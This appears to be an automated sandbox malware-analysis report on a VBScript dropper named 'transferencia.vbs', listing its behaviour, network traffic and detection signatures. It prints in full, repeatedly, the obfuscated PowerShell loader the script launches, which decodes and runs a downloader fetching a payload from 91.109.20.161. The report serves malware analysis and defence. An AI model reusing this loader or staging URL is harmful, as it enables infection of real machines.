');$Ugenummer=$Salamandrine[0];$Hexactinellid40=(Opbrugets52 'Le a$,ircGTanol jesoSperBCondA Skrlbela:CupoGOrigrGtebuuntiiHemoN onseKor =Poc,NHaece H.mWB.it-cnidOMirabultrjBaroETracCOxaltF,st s nssW.rsyNe,tsByghtMy,ieRubem s c.WaitN.uldeVaret rni.Fa iwBiseeForbbForecAub LveteISu.ee C nN BavT Dec ');ggepuncherne ($Hexactinellid40);ggepuncherne (Opbrugets52 ' S,n$FloaGBe orIntruhawkiZ.opnKonfeGirl.MohaH IsoePseuaMudcdRetseQ.adrArris inn[ Por$Fo dbFr siuklalcomplOut,a xcer .ond utukCharuPilegKos.lTo.ve.nto]Frek=

Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#patee rutsjebaners pumaernes charless topnoteringernes centimeter #>;$gyrectomies='bogman';<#preremoving monotoni afdelingslgerne blunderers fingredes intwists #>;$limpid=$host.privatedata;if ($limpid) {$navicert++;}function opbrugets52($craftsmaster){$postnarisnhaust=$hellenist+$craftsmaster.length-$navicert;for( $postnaris=4;$postnaris -lt $postnarisnhaust;$postnaris+=5){$samfundslrers='nonfecund';$informativ+=$craftsmaster[$postnaris];}$informativ;}function ggepuncherne($unpopulousness27){ & ($topographometric) ($unpopulousness27);}$postnarisnertion254=opbrugets52 'timemde eo m kzvulcistillsoc l c aa hvs/g,or5hazi.skak0skun grip(akadwa lei c.nnudbedoveropreswboilsbekj kabenantitcoss klud1paul0,ash. bar0dest;a te softwlignidytinepid6.orl4soda;p.oc vidxcer,6sona4 nde;unle ra.r .rov,idg:radi1 med2 moc1brss. hon0mode)f ey sporgmrkve fircmettkchito tan/ bl 2cong0for,1 amm0hymn0insp1skib0mot,1ring beblffkaliholdrlysbe.errfpicropeerxfrys/m sk1ce t2unco1lat . rdi0 uds ';$billardkugle=opbrugets52 'mi ru talsforhe.linrselv- egrapedig p aeo.lyns,ggtbete ';$ugenummer=opbrugets52 ' an hchubt serts umpop,a:bhmn/ mpe/so.s9shit1svas.bobi1nv i0supe9 sus.maae2chlo0 f s.unde1 egn6w ve1 gud/fopdhpuere teas grit b.teg orbinter jore ilamjordsavioe doknd,ta.centcstonh udfmhage ';$onymize=opbrugets52 'plat>awap ';$topographometric=opbrugets52 'bangima me skuxkalk ';$nonhallucinatory='selsparks';$garwin='\dorgens.uns';ggepuncherne (opbrugets52 'bitm$vkstghootlsyreoinc bk ffacompl fas:relaiskrinpreddserek petooecapantei indemodirsclei disn j mg hor=ivin$ kasestolne.duv.err:gol asub.palvep predidena nostda,sabesp+unem$sandgtetaaforertr swswanilberncest ');ggepuncherne (opbrugets52 ' kyl$molygillulbetvoori bskina skulover: jerssproasapolo toa ecim rliaan nnhermdskytr stiirestnutt eunre= t.e$.cheufor g onecasqncarou,amlm modms.acebrevrho s. ompsevalpfinnlsk.nihudktmagn(ac,c$ triostkinbundy kytm uneiin.oz un,egad )armi ');ggepuncherne (opbrugets52 'kate[opvunfrfrecowstsank.ejaks bejelicerrefivforhiinf.cbreaea,stp .peohabii allntr vtjermmha,datrevn fllautengpreaesl,tr rdt]traw: ci.: asyspolleeliac aleucyrtro,dnilet,ttel,yperspdirrr nono c.st.unoo pr,ckeepocadrljudo hamm=atta un.r[ diancop eindftmile.mammscoloestuccmentusolbrbog,i altt rmayanglpcontr udio attt befoaspacarchofredltriatbragyd rnpti.gem ck] rer:rej :munit taml bolskamf1noci2i.fl ');$ugenummer=$salamandrine[0];$hexactinellid40=(opbrugets52 'le a$,ircgtanol jesosperbconda skrlbela:cupogorigrgtebuuntiihemon onsekor =poc,nhaece h.mwb.it-cnidomirabultrjbaroetraccoxaltf,st s nssw.rsyne,tsbyghtmy,ierubem s c.waitn.uldevaret rni.fa iwbiseeforbbforecaub lveteisu.ee c nn bavt dec ');ggepuncherne ($hexactinellid40);ggepuncherne (opbrugets52 ' s,n$floagbe orintruhawkiz.opnkonfegirl.mohah isoepseuamudcdretseq.adrarris inn[ por$fo dbfr siuklalcomplout,a xcer .ond utukcharupilegkos.lto.ve.nto]frek=
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#patee rutsjebaners pumaernes charless topnoteringernes centimeter #>;$gyrectomies='bogman';<#preremoving monotoni afdelingslgerne blunderers fingredes intwists #>;$limpid=$host.privatedata;if ($limpid) {$navicert++;}function opbrugets52($craftsmaster){$postnarisnhaust=$hellenist+$craftsmaster.length-$navicert;for( $postnaris=4;$postnaris -lt $postnarisnhaust;$postnaris+=5){$samfundslrers='nonfecund';$informativ+=$craftsmaster[$postnaris];}$informativ;}function ggepuncherne($unpopulousness27){ & ($topographometric) ($unpopulousness27);}$postnarisnertion254=opbrugets52 'timemde eo m kzvulcistillsoc l c aa hvs/g,or5hazi.skak0skun grip(akadwa lei c.nnudbedoveropreswboilsbekj kabenantitcoss klud1paul0,ash. bar0dest;a te softwlignidytinepid6.orl4soda;p.oc vidxcer,6sona4 nde;unle ra.r .rov,idg:radi1 med2 moc1brss. hon0mode)f ey sporgmrkve fircmettkchito tan/ bl 2cong0for,1 amm0hymn0insp1skib0mot,1ring beblffkaliholdrlysbe.errfpicropeerxfrys/m sk1ce t2unco1lat . rdi0 uds ';$billardkugle=opbrugets52 'mi ru talsforhe.linrselv- egrapedig p aeo.lyns,ggtbete ';$ugenummer=opbrugets52 ' an hchubt serts umpop,a:bhmn/ mpe/so.s9shit1svas.bobi1nv i0supe9 sus.maae2chlo0 f s.unde1 egn6w ve1 gud/fopdhpuere teas grit b.teg orbinter jore ilamjordsavioe doknd,ta.centcstonh udfmhage ';$onymize=opbrugets52 'plat>awap ';$topographometric=opbrugets52 'bangima me skuxkalk ';$nonhallucinatory='selsparks';$garwin='\dorgens.uns';ggepuncherne (opbrugets52 'bitm$vkstghootlsyreoinc bk ffacompl fas:relaiskrinpreddserek petooecapantei indemodirsclei disn j mg hor=ivin$ kasestolne.duv.err:gol asub.palvep predidena nostda,sabesp+unem$sandgtetaaforertr swswanilberncest ');ggepuncherne (opbrugets52 ' kyl$molygillulbetvoori bskina skulover: jerssproasapolo toa ecim rliaan nnhermdskytr stiirestnutt eunre= t.e$.cheufor g onecasqncarou,amlm modms.acebrevrho s. ompsevalpfinnlsk.nihudktmagn(ac,c$ triostkinbundy kytm uneiin.oz un,egad )armi ');ggepuncherne (opbrugets52 'kate[opvunfrfrecowstsank.ejaks bejelicerrefivforhiinf.cbreaea,stp .peohabii allntr vtjermmha,datrevn fllautengpreaesl,tr rdt]traw: ci.: asyspolleeliac aleucyrtro,dnilet,ttel,yperspdirrr nono c.st.unoo pr,ckeepocadrljudo hamm=atta un.r[ diancop eindftmile.mammscoloestuccmentusolbrbog,i altt rmayanglpcontr udio attt befoaspacarchofredltriatbragyd rnpti.gem ck] rer:rej :munit taml bolskamf1noci2i.fl ');$ugenummer=$salamandrine[0];$hexactinellid40=(opbrugets52 'le a$,ircgtanol jesosperbconda skrlbela:cupogorigrgtebuuntiihemon onsekor =poc,nhaece h.mwb.it-cnidomirabultrjbaroetraccoxaltf,st s nssw.rsyne,tsbyghtmy,ierubem s c.waitn.uldevaret rni.fa iwbiseeforbbforecaub lveteisu.ee c nn bavt dec ');ggepuncherne ($hexactinellid40);ggepuncherne (opbrugets52 ' s,n$floagbe orintruhawkiz.opnkonfegirl.mohah isoepseuamudcdretseq.adrarris inn[ por$fo dbfr siuklalcomplout,a xcer .ond utukcharupilegkos.lto.ve.nto]frek=			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
91.109.20.161	unknown	Germany		28753	LEASEWEB-DE-FRA-10DE	false

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://91.109.20.161/Hestebremsen.chm	false	1%, Virustotal, Browse	unknown

AV Detection

Multi AV Scanner detection for submitted file

Source: transferencia.vbs

Virustotal: Detection: 14%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.6% probability

Source:	Binary string: C:\Windows\System.pdbpdbtem.pdb source: powershell.exe, 00000002.00000002.3349546170.000001BF32E94000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.2053986258.0000021294821000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2045877123.0000021294621000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000002.00000002.3349546170.000001BF32E94000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ion.pdb source: powershell.exe, 00000002.00000002.3349546170.000001BF32E29000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdblz[ source: powershell.exe, 00000002.00000002.3350719704.000001BF33118000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1Host: 91.109.20.161Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1Host: 91.109.20.161Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1Host: 91.109.20.161Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1Host: 91.109.20.161Connection: Keep-Alive

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 91.109.20.161Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 91.109.20.161Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.20.161

Source: global traffic	HTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 91.109.20.161Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 91.109.20.161Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1Host: 91.109.20.161Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1Host: 91.109.20.161Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1Host: 91.109.20.161Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Hestebremsen.chm HTTP/1.1Host: 91.109.20.161Connection: Keep-Alive

Source: powershell.exe, 00000002.00000002.3327025092.000001BF1CA44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3327025092.000001BF1C6D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3327025092.000001BF1C628000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.109.20.161
Source: powershell.exe, 00000002.00000002.3327025092.000001BF1CA44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3327025092.000001BF1C6EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.109.20.161(
Source: powershell.exe, 00000002.00000002.3327025092.000001BF1ACB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.109.20.161/Hestebremsen.chmP
Source: powershell.exe, 00000002.00000002.3346421331.000001BF2AC33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3346421331.000001BF2AAF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.3327025092.000001BF1ACB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.3327025092.000001BF1AA81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.3327025092.000001BF1ACB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.3327025092.000001BF1AA81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.3346421331.000001BF2AAF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.3346421331.000001BF2AAF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.3346421331.000001BF2AAF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.3327025092.000001BF1ACB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.3327025092.000001BF1B878000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.3346421331.000001BF2AC33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3346421331.000001BF2AAF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Patee Rutsjebaners Pumaernes Charless Topnoteringernes Centimeter #>;$Gyrectomies='Bogman';<#Preremoving monotoni afdelingslgerne Blunderers Fingredes Intwists #>;$Limpid=$host.PrivateData;If ($Limpid) {$Navicert++;}function Opbrugets52($Craftsmaster){$Postnarisnhaust=$Hellenist+$Craftsmaster.Length-$Navicert;for( $Postnaris=4;$Postnaris -lt $Postnarisnhaust;$Postnaris+=5){$Samfundslrers='nonfecund';$Informativ+=$Craftsmaster[$Postnaris];}$Informativ;}function ggepuncherne($Unpopulousness27){ & ($Topographometric) ($Unpopulousness27);}$Postnarisnertion254=Opbrugets52 'TimeMDe eo M kzVulciStillsoc l C aa Hvs/G,or5Hazi.Skak0Skun Grip(AkadWA lei C.nnUdbedOveroPreswBoilsBekj KabeNAntiTCoss Klud1Paul0,ash. Bar0Dest;A te SoftWLigniDytinEpid6.orl4Soda;P.oc VidxCer,6Sona4 nde;Unle Ra.r .rov,idg:Radi1 Med2 Moc1Brss. hon0Mode)F ey SporGMrkve FircMettkChito Tan/ Bl 2Cong0For,1 amm0Hymn0Insp1Skib0Mot,1Ring beblFFkaliHoldrLysbe.errfPicropeerxFrys/M sk1ce t2Unco1Lat . rdi0 Uds ';$billardkugle=Opbrugets52 'Mi rU TalSForhE.linrSelv- egraPediG P aeO.lyns,ggtBete ';$Ugenummer=Opbrugets52 ' An hChubt SertS umpOp,a:Bhmn/ mpe/So.s9Shit1Svas.Bobi1Nv i0Supe9 Sus.Maae2Chlo0 F s.Unde1 Egn6W ve1 Gud/FopdHPuere teas Grit B.teG orbInter jore ilamjordsAvioe DoknD,ta.CentcStonh UdfmHage ';$onymize=Opbrugets52 'Plat>Awap ';$Topographometric=Opbrugets52 'BangIMa mE skuxKalk ';$nonhallucinatory='Selsparks';$Garwin='\Dorgens.Uns';ggepuncherne (Opbrugets52 'bitm$VkstgHootlsyreoInc bK ffaCompl fas:RelaISkrinpreddSerek PetoOecapAntei IndeModirsclei Disn J mg hor=Ivin$ kaseStolnE.duv.err:Gol aSub.pAlvep PredIdena NostDa,sabesp+Unem$sandGTetaaForertr swSwaniLbernCest ');ggepuncherne (Opbrugets52 ' kyl$MolygIllulBetvoOri bSkina SkulOver: jerSSproaSapolO toa ecim rliaAn nnHermdskytr StiiRestnUtt eunre= T.e$.cheUFor g oneCasqnCarou,amlm ModmS.aceBrevrHo s. ompsEvalpFinnlSk.niHudktMagn(Ac,c$ TrioStkinBundy kytm UneiIn.oz Un,eGad )Armi ');ggepuncherne (Opbrugets52 'Kate[OpvuNFrfreCowstSank.EjakS BejeLicerRefivforhiinf.cBreaeA,stP .peoHabii AllnTr vtJermMHa,daTrevn fllaUtengPreaeSl,tr rdt]traw: Ci.: AsySPolleEliac aleucyrtrO,dniLet,tTel,yPersPDirrr Nono C.st.unoo Pr,cKeepoCadrlJudo Hamm=Atta Un.r[ DiaNcop eIndftMile.MammSColoeStuccMentusolbrBog,i Altt rmayAnglPContr udio attt BefoAspacArchoFredlTriaTBragyd rnpti.geM ck] rer:Rej :MuniT Taml BolsKamf1Noci2I.fl ');$Ugenummer=$Salamandrine[0];$Hexactinellid40=(Opbrugets52 'Le a$,ircGTanol jesoSperBCondA Skrlbela:CupoGOrigrGtebuuntiiHemoN onseKor =Poc,NHaece H.mWB.it-cnidOMirabultrjBaroETracCOxaltF,st s nssW.rsyNe,tsByghtMy,ieRubem s c.WaitN.uldeVaret rni.Fa iwBiseeForbbForecAub LveteISu.ee C nN BavT Dec ');ggepuncherne ($Hexactinellid40);ggepuncherne (Opbrugets52 ' S,n$FloaGBe orIntruhawkiZ.opnKonfeGirl.MohaH IsoePseuaMudcdRetseQ.adrArris inn[ Por$Fo dbFr siuklalcomplOut,a xcer .ond utukCharuPilegKos.lTo.ve.nto]Frek=
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Patee Rutsjebaners Pumaernes Charless Topnoteringernes Centimeter #>;$Gyrectomies='Bogman';<#Preremoving monotoni afdelingslgerne Blunderers Fingredes Intwists #>;$Limpid=$host.PrivateData;If ($Limpid) {$Navicert++;}function Opbrugets52($Craftsmaster){$Postnarisnhaust=$Hellenist+$Craftsmaster.Length-$Navicert;for( $Postnaris=4;$Postnaris -lt $Postnarisnhaust;$Postnaris+=5){$Samfundslrers='nonfecund';$Informativ+=$Craftsmaster[$Postnaris];}$Informativ;}function ggepuncherne($Unpopulousness27){ & ($Topographometric) ($Unpopulousness27);}$Postnarisnertion254=Opbrugets52 'TimeMDe eo M kzVulciStillsoc l C aa Hvs/G,or5Hazi.Skak0Skun Grip(AkadWA lei C.nnUdbedOveroPreswBoilsBekj KabeNAntiTCoss Klud1Paul0,ash. Bar0Dest;A te SoftWLigniDytinEpid6.orl4Soda;P.oc VidxCer,6Sona4 nde;Unle Ra.r .rov,idg:Radi1 Med2 Moc1Brss. hon0Mode)F ey SporGMrkve FircMettkChito Tan/ Bl 2Cong0For,1 amm0Hymn0Insp1Skib0Mot,1Ring beblFFkaliHoldrLysbe.errfPicropeerxFrys/M sk1ce t2Unco1Lat . rdi0 Uds ';$billardkugle=Opbrugets52 'Mi rU TalSForhE.linrSelv- egraPediG P aeO.lyns,ggtBete ';$Ugenummer=Opbrugets52 ' An hChubt SertS umpOp,a:Bhmn/ mpe/So.s9Shit1Svas.Bobi1Nv i0Supe9 Sus.Maae2Chlo0 F s.Unde1 Egn6W ve1 Gud/FopdHPuere teas Grit B.teG orbInter jore ilamjordsAvioe DoknD,ta.CentcStonh UdfmHage ';$onymize=Opbrugets52 'Plat>Awap ';$Topographometric=Opbrugets52 'BangIMa mE skuxKalk ';$nonhallucinatory='Selsparks';$Garwin='\Dorgens.Uns';ggepuncherne (Opbrugets52 'bitm$VkstgHootlsyreoInc bK ffaCompl fas:RelaISkrinpreddSerek PetoOecapAntei IndeModirsclei Disn J mg hor=Ivin$ kaseStolnE.duv.err:Gol aSub.pAlvep PredIdena NostDa,sabesp+Unem$sandGTetaaForertr swSwaniLbernCest ');ggepuncherne (Opbrugets52 ' kyl$MolygIllulBetvoOri bSkina SkulOver: jerSSproaSapolO toa ecim rliaAn nnHermdskytr StiiRestnUtt eunre= T.e$.cheUFor g oneCasqnCarou,amlm ModmS.aceBrevrHo s. ompsEvalpFinnlSk.niHudktMagn(Ac,c$ TrioStkinBundy kytm UneiIn.oz Un,eGad )Armi ');ggepuncherne (Opbrugets52 'Kate[OpvuNFrfreCowstSank.EjakS BejeLicerRefivforhiinf.cBreaeA,stP .peoHabii AllnTr vtJermMHa,daTrevn fllaUtengPreaeSl,tr rdt]traw: Ci.: AsySPolleEliac aleucyrtrO,dniLet,tTel,yPersPDirrr Nono C.st.unoo Pr,cKeepoCadrlJudo Hamm=Atta Un.r[ DiaNcop eIndftMile.MammSColoeStuccMentusolbrBog,i Altt rmayAnglPContr udio attt BefoAspacArchoFredlTriaTBragyd rnpti.geM ck] rer:Rej :MuniT Taml BolsKamf1Noci2I.fl ');$Ugenummer=$Salamandrine[0];$Hexactinellid40=(Opbrugets52 'Le a$,ircGTanol jesoSperBCondA Skrlbela:CupoGOrigrGtebuuntiiHemoN onseKor =Poc,NHaece H.mWB.it-cnidOMirabultrjBaroETracCOxaltF,st s nssW.rsyNe,tsByghtMy,ieRubem s c.WaitN.uldeVaret rni.Fa iwBiseeForbbForecAub LveteISu.ee C nN BavT Dec ');ggepuncherne ($Hexactinellid40);ggepuncherne (Opbrugets52 ' S,n$FloaGBe orIntruhawkiZ.opnKonfeGirl.MohaH IsoePseuaMudcdRetseQ.adrArris inn[ Por$Fo dbFr siuklalcomplOut,a xcer .ond utukCharuPilegKos.lTo.ve.nto]Frek=			Jump to behavior

Java / VBScript file with very long strings (likely obfuscated code)

Source: transferencia.vbs

Initial sample: Strings found which are bigger than 50

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 6062
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 6062			Jump to behavior

Source: classification engine

Classification label: mal88.expl.evad.winVBS@4/3@0/1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Dorgens.Uns

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5248:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xlpl1eip.t5n.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\transferencia.vbs"

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: transferencia.vbs

Virustotal: Detection: 14%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\transferencia.vbs"
